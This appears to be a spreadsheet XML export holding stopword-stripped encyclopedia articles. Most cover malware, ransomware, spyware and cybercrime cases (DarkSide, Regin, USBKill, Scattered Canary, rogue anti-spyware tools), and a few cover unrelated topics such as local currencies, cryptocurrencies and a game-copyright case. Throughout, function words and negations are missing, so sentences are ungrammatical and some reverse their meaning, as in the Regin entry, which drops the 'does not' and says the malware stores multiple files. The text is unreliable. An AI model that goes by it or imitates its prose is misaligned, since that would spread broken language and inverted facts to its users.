allegedly launching samsam ransomware. allegedly made million extortion caused million damages using malware. darkside 2021 cyberattack executed colonial pipeline. federal bureau investigation identified darkside perpetrator colonial pipeline ransomware attack, perpetrated malicious code, voluntary shutdown main pipeline supplying fuel east coast united states. attack described worst cyberattack date u.s. critical infrastructure. darkside successfully extorted bitcoin (almost us$5 million) colonial pipeline. u.s. officials investigating whether attack purely criminal took place involvement russian government another state sponsor. following attack, darkside posted statement claiming apolitical, participate geopolitics...our goal make money creating problems society." sentinelone published analysis darkside ransomware attack. 2021, cybersecurity infrastructure security agency issued joint alert urging owners operators critical infrastructure take certain steps reduce vulnerability darkside ransomware ransomware general. syskey syskey utility included windows nt-based operating systems encrypt user account database, optionally password. tool sometimes effectively used ransomware technical support scams—where caller remote access computer tool lock user computer password known them. syskey removed later versions windows windows server 2017, obsolete "known used hackers part ransomware scams". ransomware-as-a-service ransomware-as-a-service (raas) became notable method russia-based russian-speaking group revil staged operations several targets, including brazil-based s.a. 2021, us-based kaseya limited july 2021. after july 2021 phone call united states president biden russian president vladimir putin, biden told press, made clear united states expects ransomware operation coming soil even though it’s sponsored state, expect give enough information is." biden later added united states would take group's servers putin not. four days later, revil websites infrastructure vanished internet. mitigation attack suspected detected early stages, takes time encryption take place; immediate removal malware relatively simple process) completed would stop damage data, without salvaging already lost.security experts suggested precautionary measures dealing ransomware. using software security policies block known payloads launching help prevent infection, protect attacks such, proper backup solution critical component defending ransomware. note that, many ransomware attackers encrypt victim's live machine also attempt delete backups stored locally accessible network nas, also critical maintain "offline" backups data stored locations inaccessible potentially infected computer, external storage drives devices access network (including internet), prevents accessed ransomware. moreover, using cloud storage, computer append-only permission destination storage, cannot delete overwrite previous backups. according comodo, applying attack surface reduction os/kernel provides materially-reduced attack surface results heightened security posture.installing security updates issued software vendors mitigate vulnerabilities leveraged certain strains propagate. other measures include cyber hygiene exercising caution opening e-mail attachments links, network segmentation, keeping critical computers isolated networks. furthermore, mitigate spread ransomware measures infection control applied. such include disconnecting infected machines networks, educational programs, effective communication channels, malware surveillance ways collective participation file system defenses ransomware number file systems keep snapshots data hold, used recover contents files time prior ransomware attack event ransomware disable windows, volume shadow copy (vss) often used store backups data; ransomware often targets snapshots prevent recovery therefore often advisable disable user access user tool vssadmin.exe reduce risk ransomware disable delete past copies. windows users specific directories files controlled folder access windows defender protect ransomware. advised backup important directories controlled folder access. unless malware gains root host system deploying attack coded issue administrative commands, file servers running broadly immune ransomware, capable snapshotting even large file system many times hour, snapshots immutable (read only) easily rolled back files recovered event data corruption. general, administrator delete (but cannot modify) snapshots. file decryption recovery there number tools intended specifically decrypt files locked ransomware, although successful recovery possible. encryption used files, decryption tools files uncorrupted backups encrypted copies known-plaintext attack jargon cryptanalysis. but, works cipher attacker used weak begin with, vulnerable known-plaintext attack); recovery key, possible, take several days. free ransomware decryption tools help decrypt files encrypted following forms ransomware: aes_ni, alcatraz locker, apocalypse, badblock, bart, btcware, crypt888, cryptomix, crysis, encryptile, findzip, globe, hidden tear, jigsaw, lambdalocker, legion, noobcrypt, stampado, szflocker, teslacrypt, xdata. more ransom project initiative netherlands' police's national high tech crime unit, europol’s european cybercrime centre, kaspersky mcafee help ransomware victims recover data without paying ransom. they offer free cryptosheriff tool analyze encrypted files search decryption tools.in addition, copies files exist disk, previously deleted. cases, deleted versions still recoverable using software designed purpose. growth ransomware malicious software first confined countries eastern europe subsequently spread across atlantic united states canada. number cyberattacks 2020 double 2019. first versions type malware used various techniques disable computers locking victims system machine (locker ransomware) [133]. ransomware uses different tactics extort victims. common methods locking device's screen displaying message branch local enforcement alleging victim must fine illegal activity. ransomware request payment sending message premium rate number. some similar variants malware display pornographic image content demanded payment removal it.in 2016, significant uptick ransomware attacks hospitals noted. according 2017 internet security threat report symantec corp, ransomware affected systems also patient care, clinical operations, billing. online criminals motivated money available sense urgency within healthcare system.ransomware growing rapidly across internet users also environment. problem millions dollars lost organizations industries decided pay, hollywood presbyterian medical center medstar health.according symantec 2019 istr report, first time since 2013, 2018 observed decrease ransomware activity drop percent. before 2017, consumers preferred victims, 2017 changed dramatically, moved enterprises. 2018 path accelerated percent infections represented percent increase. common distribution method today based email campaigns. first reported death following ransomware attack german hospital october 2020.an effective successful cyber awareness training program must sponsored organization supporting policies procedures effectively outline ramifications non-compliance, frequency training process acknowledgement training. without sponsorship “c-level” executives training cannot ignored. other factors successful cyber awareness training program establish baseline identifying level knowledge organization establish users knowledge prior training after. whichever approach organization decides implement, important organization policies procedures place provide training date, performed frequently backing entire organization down. investment technology detect stop threats must maintained, along need remember focus weakest link, user. criminal arrests convictions zain qaiser british student, zain qaiser, barking, london jailed years kingston crown court ransomware attacks 2019. said "the prolific cyber criminal sentenced uk". became active contacted russian controller powerful attacks, believed lurk malware gang, arranged split profits. also contacted online criminals china move money. half years, posed legitimate supplier online promotions book advertising world's visited legal pornography websites. each adverts promoted websites contained reveton ransomware strain malicious angler exploit (aek) seized control machine. investigators discovered £700,000 earnings, although network earned £4m. hidden money using cryptocurrencies. ransomware would instruct victims greendot moneypak vouchers, enter code reveton panel displayed screen. this money entered moneypak account managed qaiser, would deposit voucher payments american co-conspirator's debit card—that raymond odigie uadiale, student florida international university 2012 2013 later worked microsoft. uadiale would convert money liberty reserve digital currency deposit qaiser's liberty reserve account.a breakthrough case occurred 2013 authorities several countries seized liberty reserve servers, obtaining access transactions account history. qaiser running encrypted virtual machines macbook windows operating systems. could tried earlier sectioned mental health goodmayes hospital (where found using hospital wi-fi access advertising sites.) lawyer claimed qaiser suffered mental illness. russian police arrested members lurk malware gang june 2016. uadiale, naturalized citizen nigerian descent, jailed months. freedom speech challenges criminal punishment publication proof-of-concept attack code common among academic researchers vulnerability researchers. teaches nature threat, conveys gravity issues, enables countermeasures devised place. however, lawmakers support law-enforcement bodies contemplating making creation ransomware illegal. state maryland, original draft made felony create ransomware, punishable years prison. however, provision removed final version bill. minor japan arrested creating distributing ransomware code. young yung ansi source code ransomware cryptotrojan on-line, cryptovirology.com, since 2005 part cryptovirology book written. source code cryptotrojan still live internet associated draft chapter also references further reading young, yung, (2004). malicious cryptography: exposing cryptovirology. wiley. isbn 978-0-7645-4975-5. russinovich, mark january 2013). "hunting down killing ransomware". microsoft technet. microsoft. simonite, february 2015). "holding data hostage: perfect internet crime? ransomware (scareware)". technology review. brad, duncan march 2015). "exploit kits cryptowall 3.0". rackspace blog! newsroom. archived original september 2015. retrieved april 2015. "ransomware rise: partners working combat this cyber threat". news. federal bureau investigation. january 2015. yang, yang, qian, d.c.t.; qian, tao, (2015). 2015 ieee 17th international conference high performance computing</t>
  </si>
  <si>
    <t>Scattered Canary</t>
  </si>
  <si>
    <t>scattered canary nigerian fraud ring. during covid-19 lockdowns 2020, group used business email compromise and, according united states secret service, "hundreds thousands" money mules defraud u.s. state unemployment agencies. security firm tracked group said started 2009 committing craigslist scams, 2015 began phishing, 2016 committing return fraud credit card fraud, specializing ripoffs government agencies 2017. washington state employment security department said group stolen hundreds millions dollars 2020; estimate loss washington state auditor runs high $600 million. 2021, investigative journalists reported accessed 13-page "how guide published scattered canary defrauding texas unemployment system, paid $800 million fraudulent claims. references sources dilanian, ramgopal chloe atkins (august 2001). "'easy money': international scam artists pulled epic theft covid benefits". news.{{cite news}}: maint: uses authors parameter (link) "the nigerian fraudsters ripping unemployment system". wired. august 2021. security researchers spotted "scattered canary" group scamming vital benefits programs amid covid-19 pandemic podkul, cezary (july 2021), unemployment insurance fraud exploded during pandemic, propublica roberts, paul (may 2021), nigerian allegedly participated scam stealing $650m washington state arrested york, seattle times spokesman-review (spokane) massive fraud state unemployment insurance programs, united states secret service global investigative operations center (gioc), 2020, gioc reference #20-027-1 new, brian (may 2021), nigerian cybercriminal gang targets texas unemployment system, dallas-fort worth: ktvt malcolm, kim; hurst, andy (april 2021), washington state auditor's report details unemployment fraud, seattle: kuow corte, rachel (may 2020). "washington recovers $300m fraudulent unemployment claims". associated press news. washington officials state recovered $300 million paid criminals used stolen personal information file fraudulent unemployment benefit claims...much apparently went west african fraud ring dubbed scattered canary. geranios, nicholas (december 2020). "audit: inadequate control prevent state unemployment scam". associated press. slew illegal unemployment insurance claims last spring totaled $600 million grew largest fraud state history, washington state auditor said friday....much money apparently went west african fraud ring...dubbed scattered canary. further reading bakare, tonye 2020), "nigerian group named covid-19-related unemployment benefits fraud us", guardian, lagos, nigeria brunner, jim; roberts, paul; malone, patrick (may 2020). "how missed 'red flags' helped nigerian fraud ring 'scattered canary' bilk washington's unemployment system amid coronavirus chaos". seattle times. retrieved 2020.</t>
  </si>
  <si>
    <t>Stars virus</t>
  </si>
  <si>
    <t>stars virus computer virus infects computers running microsoft windows. named discovered iranian authorities april 2011. iran claimed used tool commit espionage. western researchers came believe probably thing duqu virus, part stuxnet attack iran. history stars virus studied laboratory iran means major vendors antivirus software access samples therefore could assess potential relation duqu stuxnet. foreign computer experts seen evidence virus, even doubt actual existence. iran claiming stars harmful computer systems. said inflict minor damage initial stage might mistaken executable files governmental organizations.this second attack claimed iran stuxnet computer worm discovered july 2010, targeted industrial software equipment.researchers came believe stars virus found iranian computer specialists duqu virus. duqu virus keylogger embedded jpeg file. since file taken keylogger portion image remained. turned image taken hubble telescope showing cluster stars, aftermath galaxies colliding. symantec, kaspersky crysys researchers came believe duqu stars virus. also flame (malware) cyber electronic warfare cyber security standards cyber warfare list cyber attack threat trends proactive cyber defence references</t>
  </si>
  <si>
    <t>USBKill</t>
  </si>
  <si>
    <t>usbkill anti-forensic software distributed github, written python bsd, linux, operating systems. designed serve kill switch computer installed fall control individuals entities desires owner. free software, available general public license.the program's developer, goes online name hephaest0s, created response circumstances arrest silk road founder ross ulbricht, u.s. federal agents able access incriminating evidence laptop without needing cooperation copying data flash drive distracting him. maintains whitelist devices allowed connect computer's ports; device whitelist connects, take actions ranging merely returning lock screen encrypting hard drive, wiping data computer. however, also used part computer security regimen prevent surreptitious installation malware spyware clandestine duplication files, according creator. background when enforcement agencies began making computer crime arrests 1990s, would often judges knock search warrants, deny targets time delete incriminating evidence computers storage media. extreme circumstances likely targets could advance notice arriving police, judges would grant "power-off" warrants, allowing utilities turn electricity location raid shortly beforehand, forestalling efforts destroy evidence could seized. these methods effective criminals produced distributed pirated software movies: primary large-scale computer crime era.by 2010s, circumstances computer crime changed along legitimate computer use. criminals likely internet facilitate crimes, needed remain online time. still keep activities discreet, used computer security features like lock screens password protection.for reasons, enforcement attempts apprehend suspected cybercriminals computers use, accounts computer online open logged thus easily searchable. fail seize computer condition, methods available bypass password protection, take time police available. might legally impossible compel suspect relinquish password; united states, many computer-crime investigations take place, courts distinguished forcing suspect material means protecting data thumbprint, retinal scan, key, opposed password passcode, purely product suspect's mental processes thus protected compelled disclosure fifth amendment.the usual technique authorities—either public entities enforcement private organizations like companies—seizing computer (usually laptop) believe used improperly first physically separate suspect user computer enough cannot touch prevent closing lid, unplugging typing command. once done often install device port spoofs minor actions mouse, touchpad, keyboard, preventing computer going sleep mode, would usually return lock screen would require password.agents u.s. federal bureau investigation (fbi) investigating ross ulbricht, founder online black market silk road, learned often site laptop, using wireless networks available branches francisco public library. when enough evidence arrest him, planned catch running silk road, computer logged they needed ensure unable trigger encryption delete evidence did.in october 2013, male female agent pretended lovers' quarrel near ulbricht working glen park branch. according business insider, ulbricht distracted problem was, whereupon female agent grabbed laptop male agent restrained ulbricht. female agent able insert flash drive laptop's ports, software copied files. according joshuah bearman wired, third agent grabbed laptop ulbricht distracted apparent lovers' fight handed agent kiernan. response circumstances ulbricht's arrest, programmer known hephaest0s developed usbkill code python uploaded github 2014. available free software general public license currently runs linux program, installed, prompts user create whitelist devices allowed connect computer ports, checks adjustable sample rate. user also choose actions computer take detects device whitelist default, shuts erases data swap file). users need logged root. hephaest0s cautions users must using least partial disk encryption along usbkill fully prevent attackers gaining access; gizmodo suggests using virtual machine present computer reboots.it also used reverse, whitelisted flash drive port attached user's wrist lanyard serving key. instance, flash drive forcibly removed, program initiate desired routines. "[it] designed thing," wrote aaron grothe short article usbkill 2600, "and pretty well." precaution, suggests users rename something innocuous loaded computers, case someone might looking seized computer disable it.in addition designed purpose, hephaest0s suggests uses unconnected user's desire frustrate police prosecutors. part general security regimen, could used prevent surreptitious installation malware spyware copying files from, protected computer. also recommended general part robust security practice, even threats feared. variations modifications with 2600 article, grothe shared patch included feature allowed program shut network non-whitelisted inserted terminal. nate brune, another programmer, created silk guardian, version usbkill takes form loadable kernel module, since "[felt] could implemented better already is." issue 2600 following grothe's article, another writer, going name jack ripper, explained ninja operating system designed live flash drives, handles issue. uses bash script resident memory based watchdog timer cycles loop boot device (i.e., flash drive) three times second still mounted reboots computer not. also buskill list data-erasing software list free open-source software packages references external links usbkill github</t>
  </si>
  <si>
    <t>Regin (malware)</t>
  </si>
  <si>
    <t>regin (also known prax qwerty) sophisticated malware hacking toolkit used united states' national security agency (nsa) british counterpart, government communications headquarters (gchq). first publicly revealed kaspersky lab, symantec, intercept november 2014. malware targets specific users microsoft windows-based computers linked intelligence-gathering agency british counterpart, gchq. intercept provided samples regin download, including malware discovered belgian telecommunications provider, belgacom. kaspersky says first became aware regin spring 2012, earliest samples date 2003. (the name regin first found virustotal website march 2011.) among computers infected worldwide regin, percent russia, percent saudi arabia, percent mexico ireland, percent india, afghanistan, iran, belgium, austria, pakistan.kaspersky said malware's main victims private individuals, small businesses telecom companies. regin compared stuxnet thought developed "well-resourced teams developers", possibly western government, targeted multi-purpose data collection tool.according welt, security experts microsoft gave name "regin" 2011, cunning norse dwarf regin. operation regin uses modular approach allowing load features exactly target, enabling customized spying. design makes highly suited persistent, long-term mass surveillance operations targets.regin stealthy store multiple files infected system; instead uses encrypted virtual file system (evfs) entirely contained within looks like single file innocuous name host, within files identified numeric code, name. evfs employs variant encryption rarely used cipher. regin communicates internet using icmp/ping, commands embedded http cookies custom protocols command control server control operations, upload additional payloads, etc. identification naming symantec says kaspersky identified malware backdoor.regin. most antivirus programs, including kaspersky, october 2015) identify sample regin released intercept malware. march 2011 microsoft added related entries malware encyclopedia; later variants, regin.b regin.c added. microsoft appears call 64-bit variants regin prax.a prax.b. microsoft entries technical information. both kaspersky symantec published white papers information learned malware. known attacks originator malware german news magazine spiegel reported june 2013 intelligence national security agency (nsa) conducted online surveillance european union (eu) citizens institutions. information derives secret documents obtained former worker edward snowden. both spiegel intercept quote secret 2010 document stating made cyberattacks year, without specifying malware used, diplomatic representations washington, d.c. representations united nations. signs identifying software used regin found investigators infected machines. intercept reported that, 2013, uk's gchq attacked belgacom, belgium's largest telecommunications company. these attacks regin coming attention security companies. based analysis done security firm spiegel reported november 2014, regin tool intelligence agencies. found regin computers customers, according analysis parts regin mentioned catalog names "straitbizarre" "unitedrake". name customer, spiegel mentioned among customers belgacom cited head ronald prins, stated allowed speak found belgacom network.in december 2014, german newspaper bild reported regin found flash drive used staff member chancellor angela merkel. checks high-security laptops german chancellery revealed additional infections.regin used october november 2018 hack research development unit yandex. also advanced persistent threat cyberwarfare united states catalog stuxnet warrior pride references</t>
  </si>
  <si>
    <t>Stroud pound</t>
  </si>
  <si>
    <t>stroud pound local currency stroud, gloucestershire. unveiled september 2009, scheme third local currency scheme introduced england recent years totnes pound lewes pound. history launched september 2009, scheme initiative local transition towns group. unlike totnes pound lewes pound, scheme based chiemgauer, community currency circulating chiemgau region bavaria, germany since 2003. april 2010, businesses gloucestershire enrolled programme.on launch, local currency face value 1,000 stroud pounds sold.however, 2011 £4,000 worth stroud pounds issued. some local businesses complained hassle said customers still supported preferred sterling.in 2015 discussion possible re-launch held.one founders, molly scott cato said 2016 currency "never viable".as november 2019 website updated since 2012, stroud pound co-op still exists. currency design stroud pounds available four denominations: £10. feature philippa threlfall's 1972 mural "buildings stroud" fuller's teasel (dipsacus sativus) front, various images local significance (including local celebrities, landscapes, flora fauna) back. highest denomination features laurie lee. designs printed bright colours watermarked security paper. references external links news town printing currency</t>
  </si>
  <si>
    <t>USD Coin</t>
  </si>
  <si>
    <t>coin (usdc) digital stablecoin pegged united states dollar. coin managed consortium called centre, founded circle includes members cryptocurrency exchange coinbase bitcoin mining company bitmain, investor circle. usdc issued private entity confused central bank digital currency (cbdc). circle claims usdc backed dollar held reserve, "approved investments", though detailed. wording circle website changed previous "backed dollars" "backed fully reserved assets" june 2021.the tokenization dollar coin happens three-step process: user sends dollars coin issuer's bank account. issuer uses coin smart contract create equivalent amount coin. newly minted coins sent user substituted dollars held reserve.the redemption coins dollars follows process listed above, reverse. usdc reserves regularly attested (but audited) grant thornton, llp, monthly attestations found centre consortium's website. history usdc first announced 2018 circle, launched september 2018.on march 2021, visa announced would allow usdc settle transactions payment network.as july 2022, circle states billion usdc circulation. also jeremy allaire tether (cryptocurrency) references external links official website</t>
  </si>
  <si>
    <t>Verge (cryptocurrency)</t>
  </si>
  <si>
    <t>verge currency decentralized open-source cryptocurrency offers various levels private transactions. obfuscating addresses users leveraging stealth transactions making difficult determine geolocation users.verge currency maximum supply capped 16.5 billion xvg. uses proof work (pow) mining principle multi-algorithm support different hash functions: scrypt, x17, lyra2rev2, myr-groestl blake2s. history verge currency created 2014 originally named dogecoindark. rebranded verge currency 2016.following bitcoin principle, verge currency transparent ledger allows anyone view transactions, protects user identities locations. this achieved integrating expose addresses using stealth transactions, formerly known wraith protocol, hide value transactions. april 2018, announced adult entertainment provider mindgeek would begin accepting verge currency payment option website network.also april 2018, verge currency suffered timestamp exploit mining algorithms. this could resulted attack algorithm. references</t>
  </si>
  <si>
    <t>Veriato</t>
  </si>
  <si>
    <t>veriato, formerly known spectorsoft, software company develops sells user behavior analytics employee monitoring software. based palm beach gardens, located palm beach county, florida united states. history founded 1998, company early entrant internet monitoring software.in 2008, private equity firms harbourvest partners westview capital partners invested company, taking majority ownership position. spectorsoft originally serviced consumer business customers, longer sells software consumer home use.in 2011, company opened west palm beach office london office.in 2012 spectorsoft acquired assets corner bowl software.on march 2015, company completely exited consumer market. 2016 company renamed veriato, inc.on june 12th, 2019, veriato acquired awareness technologies. awards honors spector given magazine editors' choice award 2002 review computer activity monitoring tools. 2004, version spector given editors' choice award field four programs. 2008 spector magazine editors' choice award. 2004, spectorsoft listed first time inc. magazine's fastest-growing private companies america, position 224. company achieved position list 2005 number 497. 2009 spectorsoft made list inc. 5000 companies number 3340. 2010 2011 spectorsoft made inc. magazine 500/5000 list. spectorsoft−veriato products mentioned zdnet, pc/computing, time, cnn, nightly news, york times wall street journal.in 2014, spectorsoft magazine europe best fraude prevention award best interop 2014 security award spector recon product patent infringement case patent infringement case helios software spectorsoft corporation concluded. september 2014, court granted summary judgment non-infringement ‘571 ‘237 patents. june 2015, five-day trial, jury returned verdict direct indirect infringement spectorsoft ‘304 patent, also found several asserted claims patent invalid anticipated rendered obvious prior (see docket entry civ. 12-081-lps). also computer monitoring employee monitoring software references</t>
  </si>
  <si>
    <t>Spry Fox, LLC v. Lolapps, Inc.</t>
  </si>
  <si>
    <t>spry fox, lolapps, inc., 2:12-cv-00147 (w.d. wash., 2012), court case video game developers, spry alleged game yeti town, developed 6waves lolapps, infringed copyrighted game triple town. while case settled court, preliminary opinions judge richard jones affirmed video game's "look feel" protected copyright, affirming federal district court decision tetris holding, interactive, inc. earlier year. despite games cosmetic differences different settings, similarities games evidence yeti town illegally appropriated elements triple town. judge rejected motion 6waves lolapps dismiss case, thus undermining main defense, since games several identical gameplay elements. october 2012, companies announced settlement spry would intellectual property games. background 2011, spry created triple town, players build city matching tiles, merging objects larger ones. spry approached lolapps help port game platform. parties signed non-disclosure agreement granting access triple town assets. around time, lolapps merged another social gaming company called 6waves form 6waves lolapps. within months, 6waves lolapps announced would longer work spry fox. company soon announced plans release tile-matching game, called yeti town.both games similar gameplay. they match-three games six-by-six grid. when three identical objects placed next grid, transform another object, combining shrubs tree. player tries combine objects increase score, game creates challenges placing objects clutter game grid. both games also marketplace identical prices analogous items, similar language dialog boxes. however, cosmetic differences, particularly titular yeti playing role triple town's bear, yeti town presented rather presentation triple town. claim january 2012, spry filed copyright infringement claim 6waves lolapps western district washington. during dispute, correspondence surfaced 6waves lolapps admitted yeti town "similar match-3 style" triple town. since copying usually proved showing potential infringer access original work, 6waves lolapps deny acquired access, deny validity spry fox's copyright. however, 6waves lolapps asked court dismiss case basis basic gameplay triple town protected copyright, based similar rulings data east usa, inc. epyx, inc. 1988. ruling settlement judge richard jones ruled 6waves lolapps' motion dismissal. court focused idea–expression distinction, party entitled copyright expression idea, idea itself. court excluded elements triple town copyright protection "scènes faire", using coins track score exchange in-game advantages. court also excluded purely functional elements, six-by-six game grid. court also explained copyright cannot protect overall game "idea", particularly game matching objects, objects ill-placed obstruct player. however, court found yeti town appropriated many expressive elements triple town, including hierarchy objects, presence wild creature tried foil player's progress. this despite games' visual differences, including pastoral versus snowy themes, overall distinct characters. object hierarchy similar. progressing grass bush tree similar progressing sapling tree tent cabin. perhaps importantly, object hierarchy coupled depiction field play comprise setting theme similar triple town's. snowfield different meadow, bears yetis wild creatures. there apparent differences [the] games court must focus similar, different, comparing works. there several major factors ruling. court focus made games different, focusing instead similar. court also noted existence non-disclosure agreement, giving 6waves lolapps access triple town assets. although game's names technically copyrighted, similarity relevant question substantial similarity. court also accepted evidence several online commentators games substantially similar. however, court play either game, basing opinion screenshots written descriptions gameplay. end, court denied defendant's motion dismiss copyright claim.the ruling pushed parties towards legal settlement, since much legal strategy 6waves lolapps rested argument copyright protect gameplay argument court rejected. parties soon settled court, resulting spry owning intellectual property games. impact along 2012 copyright case tetris holding, interactive, inc., ruling indicates legal system willing protect original games potential clones. although ruling motion dismiss, notable found substantial similarity despite distinguishable assets, unlike tetris case. ruling shows courts willing apply reasoning tetris xio, rulings product judge's greater experience video games rulings decades prior. kyle orland technica also compared case tetris xio, similarly argued judges evolved video game copyright greater experience medium. visual differences games show courts willing consider possibility infringement games identical. according legal scholar alex nealon, major factor ruling likely existing relationship developers. this also analysis attorney jack schecter, noted 6waves lolapps agreed develop version triple town releasing alleged clone. attorney stephen mcarthur noted pushed copyright closer protecting game mechanics punishing clones, cautioned courts find balance shutting egregious clones without giving monopolies entire genres games. eric goldman felt would difficult ever find definitive guidance copying, difficulty around interpreting idea–expression distinction. references</t>
  </si>
  <si>
    <t>Viodentia</t>
  </si>
  <si>
    <t>viodentia (sometimes written uppercase pseudonym used creator fairuse4wm, program removes microsoft's copy protection technology windows media video (".wmv") files. these files used popular music download sites rhapsody, yahoo! music, napster. background number prominent websites ensure media downloads unable copied software piracy improper purposes.this copy protection system also effect preventing would otherwise claimed fair legitimate owners backing paid downloads case loss damage computer data, devices legal viodentia fairuse4wm "viodentia" pseudonym individuals wrote software would enable users remove protection mechanism media, thus allowing copied legal use. forum posts name "viodentia" stated 2006 program enable exercise fair-use rights only, excluded import cryptographic data needed piracy usage.a lawsuit later filed microsoft, basis fairuse4wm contained proprietary computer code microsoft's windows and/or derivative work microsoft's windows media format microsoft technologies.according interview published weblog engadget, viodentia live united states. lawsuit september 2006, microsoft filed federal lawsuit john does 1-10 a/k/a "viodentia", hoping identify person persons. online post viodentia contains implicit defense microsoft's allegations copyright infringement: "fairuse4wm creation, never involved microsoft source code. link microsoft's static libraries provided compiler various platform files." unable identify locate viodentia, microsoft dropped lawsuit without prejudice 2007. references external links fairuse4wm wm/drm removal program, thread doom9's forum started viodentia containing number comments microsoft john does 1-10 fairuse4wm court filings</t>
  </si>
  <si>
    <t>Spy Phone</t>
  </si>
  <si>
    <t>phone mobile computer monitoring developed phone labs, llc. company headquartered jersey. overview allows users monitor activity different devices central account. allows track location, monitor call logs, data online activity devices. according pensacola news journal good project, used parents monitor children's activity online, well keep track elderly relatives. florida independent also noted app's application tracking cheating spouses. history phone released 2012 android operating systems. 2020, phone announced plans implement geofencing feature update. 2021, phone labs, llc. acquired spyfone.com undisclosed amount. legal controversies google lawsuit phone labs, llc., developers phone, filed million lawsuit google 2014. lawsuit alleged google allowed developers sell apps google play store trademarked name "spy phone", google retaliated phone labs developer raised complaint. "spyfone" leaks 2018, vice reported spyfone.com compromised hack exposed terabytes data app's users. according vice, hack exposed anonymous security researcher. cybersquatting lawsuit december 2020, phone labs, llc. accused cyprus-based spyware company monapp calabs lyd. cybersquatting illegally imitating company's domain name. references</t>
  </si>
  <si>
    <t>Secret (app)</t>
  </si>
  <si>
    <t>secret android service allowed people share messages anonymously within circle friends, friends friends, publicly. differs anonymous sharing apps postsecret, whisper, intended sharing primarily friends, potentially making interesting addictive people reading updates. founded david byttow, former lead square wallet, chrys bader-wechseler, former google product manager google+, photovine youtube. bader-wechseler left company january 2015, stated reason company's shift away beautiful design towards minimalistic design meant felt longer best person helm company. byttow announced shutdown company april 2015. history launch initial buzz december 2013, techcrunch reported existence secret (then stealth, purpose unclear), also raising $1.2 million, based securities exchange commission filing.the released privately within silicon valley next months. started receiving press coverage early february 2014, revealed company raised $1.4 million kleiner perkins caufield byers, google ventures, alexis ohanian garry initialized capital vehicle, index ventures, matrix partners, angel, fuel capital. number technology news websites billed secret latest craze silicon valley.the company three employees raised $8.6 million series round march 2014.false rumors impending acquisition evernote circulated secret early february 2014. business insider reported rumors (circulated secret) secret acquire whisper, another anonymous sharing app.on february mashable reported clothing retailer first brand join secret. february 2014, secret launched bounty program hackers found vulnerabilities app. february forbes reported secret would privacy controls. this happened february secret added subscribe/unsubscribe options, post flagging, unlinking options.on secret became available globally also launched android operating system. secret added improvements june: launch "secret dens" schools workplaces june ability feed friends' posts june 16.on july 2014, secret announced raised million series funders included index ventures, redpoint ventures, garry alexis ohanian, angel, fuel capital, ceyuan ventures, anonymous investors. legal challenges brazil august 2014 brazilian court granted preliminary injunction public prosecutor prohibits companies apple, google, microsoft distributing also compels three companies remotely delete users' devices. prosecutor sought injunction receiving user complaints bullying. currently, user's means redress bullies send letter english american judge brazilian foreign ministry, essentially leaving brazilian users powerless. decision based chapter article brazilian constitution. article states, "the expression thought free, anonymity forbidden." judge ruled makes secret's promise anonymity unconstitutional. three american companies given days comply facing fines 20,000 reals ($8,870) day. three american tech giants chance appeal ahead final ruling. after brazilian courts hearing, developers included features android versions aimed safeguarding user privacy. after changes, users photos taken time posting, rather images previously stored device. this direct response court's concerns private images without consent. improved screening process also implemented prevent certain feelings, keywords images published. company's team investigates possible violations users notified potential breach. redesign change focus december 2014, company announced would launch faster version chat features.in january 2015, secret launched first "geofenced feed" conference, making viewing posts restricted people within geographical location conference. later month, secret co-founder bader-wechseler left company, stated reason company's shift away beautiful design towards minimalistic design meant felt longer best person helm company.in march 2015, revealed company working apps based learned user needs secret app, intended continue retain original product. also revealed secret dens used extensively internally companies google, facebook, twitter. shutdown company april 2015, secret's founder david byttow announced decision shut company down, claiming people using app, including spreading malicious rumors, line originally envisioned. removed android stores. byttow intended next weeks wind company down, return money investors, delete user data accumulated company. decision shut company return money investors rather attempt pivot, wrote: "innovation requires failure, believe failing fast order make different mistakes." also promised eventually publish postmortems others learn unique mistakes challenges faced wisdom gained incredible months." reception reception upon release growth technology commentators likened secret shuttered postsecret whisper, part growing trend towards anonymous quasi-anonymous sharing, pushback facebook's successful push encourage real name throughout internet.an article guardian argued although secret fast becoming craze, cautious trust".detailed reviews secret published technology review techcrunch.on july 2014, sarah lacy published lengthy critique secret pandodaily, noting app's main cases spread malicious lies people organizations, puzzled investors considered ethical considering investing company. also suggested reasonable chance would lead teen suicides bullying lies spread people. secret co-founder david byttow dismissed post tweet, noting sent little traffic secret's website. paul carr responded pandodaily, secret's representative expressed disappointment saying like people wrote things others without talking first. carr responded again, noting irony tweet given secret's main case. lacy wrote follow-up post week initial post, discussing events transpired week implications thesis. reception upon shutdown upon shutdown app, mike isaac wrote york times secret's rapid rise, subsequent fall eventual shutdown illustrated "flash-in-the-pan" nature many silicon valley companies. article also noted co-founders cashed tune million earlier round fundraising, raising questions commitment confidence long-term vision success company. issie lapowsky, writing wired magazine, noted: "founder david byttow seems realized rest known along: anonymity makes people total assholes" later article questioned whether, secret enjoyed traction competitor had, byttow would still shut company down. also anonymous social media whisper (app) postsecret references external links official website</t>
  </si>
  <si>
    <t>Spy Wiper</t>
  </si>
  <si>
    <t>wiper, also known mail wiper deleter, malware program fraudulently sold antispyware program. 2005, federal trade commission filed civil suit companies seismic entertainment productions, mailwiper inc., deleter inc. suit alleged three companies illegally sold fraudulent malware program, receiving million revenue. references further reading borland, john (2004-02-11). "anti-spyware vendors come fire". cnet news. archived original 2006-11-11. retrieved 2006-12-14. fetters, eric (2004-03-03). "'spyware' sneaks in". herald. archived original 2006-05-17. retrieved 2008-06-24. fennessy, steve (2004-08-12). hated man: story spam, spyware, second chances". creative loafing atlanta. retrieved 2006-12-14. also rogue software</t>
  </si>
  <si>
    <t>SpyBouncer</t>
  </si>
  <si>
    <t>spybouncer rogue security software application developed technologies microsoft windows operating system. spybouncer listed spyware warrior "rogue anti-spyware" program aggressive advertising deliberate false positives. described symantec, makers norton antivirus, program give exaggerated reports threats compromised computer. prompt user purchase registered version software order remove reported threats." references</t>
  </si>
  <si>
    <t>SpyEye</t>
  </si>
  <si>
